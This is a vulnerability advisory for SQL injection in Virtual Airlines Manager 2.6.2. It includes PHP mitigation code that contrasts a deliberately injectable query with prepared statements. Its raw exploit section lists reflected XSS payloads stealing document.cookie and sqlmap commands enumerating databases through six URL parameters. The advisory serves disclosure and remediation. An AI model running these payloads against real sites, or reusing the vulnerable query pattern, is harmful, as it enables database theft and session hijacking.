Vendor: Virtual Airlines Manager
Author: Mosaaed
CVSS: 7.5 (HIGH)
Vulnerability Type: SQL Injection
CWE: 89
Product Name: Virtual Airlines Manager
Affected Version From: 2.6.2
Affected Version To: 2.6.2
Patch Exists: NO
Related CWE: N/A
CPE: a:virtual_airlines_manager:virtual_airlines_manager
Metasploit: N/A
Other Scripts: N/A
Platforms Tested: Ubuntu
Year: 2020

Virtual Airlines Manager 2.6.2 – ‘id’ SQL Injection

An SQL injection vulnerability exists in Virtual Airlines Manager 2.6.2. An attacker can inject malicious SQL via the 'id' parameter in the URL; the 'registry_id', 'plane_icao', 'hub_id', 'plane_location' and 'event_id' URL parameters are affected in the same way.

Mitigation:

Input should be validated and parameterized queries used, so that user-supplied values can never alter the structure of the SQL statement.
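The mitigation above, as an added example that is not Virtual Airlines Manager's own code: a hypothetical PHP page handler for the ?id= and ?plane_icao= parameters, first in the pattern that makes them injectable, then validated and bound through prepared statements (table and column names are assumed).

```php
<?php
declare(strict_types=1);
// Added example, not VAM's code. The "planes" table and its columns are assumed.

// VULNERABLE: the raw query-string value becomes part of the SQL text, so a
// crafted 'id' rewrites the statement instead of being treated as a value.
function findPlaneVulnerable(mysqli $db, array $query): ?array
{
    $id  = $query['id'] ?? '';
    $sql = "SELECT registry_id, plane_icao FROM planes WHERE id = " . $id;
    $result = $db->query($sql);
    return $result ? ($result->fetch_assoc() ?: null) : null;
}

// HARDENED: validate the shape of the input first, then bind it as a typed
// parameter. The SQL text is fixed; the value travels separately.
function findPlaneSafe(mysqli $db, array $query): ?array
{
    // An id must be a positive integer; anything else is rejected up front.
    $id = filter_var($query['id'] ?? null, FILTER_VALIDATE_INT,
                     ['options' => ['min_range' => 1]]);
    if ($id === false) {
        http_response_code(400);
        return null;
    }
    $stmt = $db->prepare('SELECT registry_id, plane_icao FROM planes WHERE id = ?');
    $stmt->bind_param('i', $id);
    $stmt->execute();
    $row = $stmt->get_result()->fetch_assoc();
    $stmt->close();
    return $row ?: null;
}

// Same treatment for a string parameter: whitelist the expected format
// (an ICAO type code is 2-4 upper-case letters/digits) and bind it as a string.
function findFleetByIcaoSafe(mysqli $db, array $query): array
{
    $icao = $query['plane_icao'] ?? '';
    if (!preg_match('/^[A-Z0-9]{2,4}$/', $icao)) {
        http_response_code(400);
        return [];
    }
    $stmt = $db->prepare('SELECT registry_id, plane_location FROM planes WHERE plane_icao = ?');
    $stmt->bind_param('s', $icao);
    $stmt->execute();
    $rows = $stmt->get_result()->fetch_all(MYSQLI_ASSOC);
    $stmt->close();
    return $rows;
}
```

The same two steps, reject anything outside the expected format and never concatenate the value into SQL, apply to the other parameters listed above.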

Exploit-DB raw data:

# Exploit Title: Virtual Airlines Manager 2.6.2 - 'id' SQL Injection
# Date: 2020-06-09
# Exploit Author: Mosaaed
# Vendor Homepage: http://virtualairlinesmanager.net/
# Dork: N/A
# Affected Version: 2.6.2
# Tested on: Ubuntu
# CVE : N/A
 
-------------------
xss

http://localhost/vam/index.php?page=plane_info_public&registry_id="><<script>alert(document.cookie);//<</script>
http://localhost/vam/index.php?page=fleet_public&plane_icao=1"><<script>alert(document.cookie);//<</script>
http://localhost/vam/index.php?page=hub&hub_id=1"><<script>alert(document.cookie);//<</script>
http://localhost/vam/index.php?page=fleet_public&plane_location=1"><<script>alert(document.cookie);//<</script>
http://localhost/vam/index.php?page=event&event_id=1"><<script>alert(document.cookie);//<</script>
-------------------------
SQL Injection
sqlmap -u "http://localhost/vam/index.php?page=manual_flight_details&ID=10" -p ID --dbs
sqlmap -u "http://localhost/vam/index.php?page=plane_info_public&registry_id=10" -p registry_id --dbs
sqlmap -u "http://localhost/vam/index.php?page=fleet_public&plane_icao=1" -p plane_icao --dbs
sqlmap -u "http://localhost/vam/index.php?page=hub&hub_id=1" -p hub_id --dbs
sqlmap -u "http://localhost/vam/index.php?page=fleet_public&plane_location=1" -p plane_location --dbs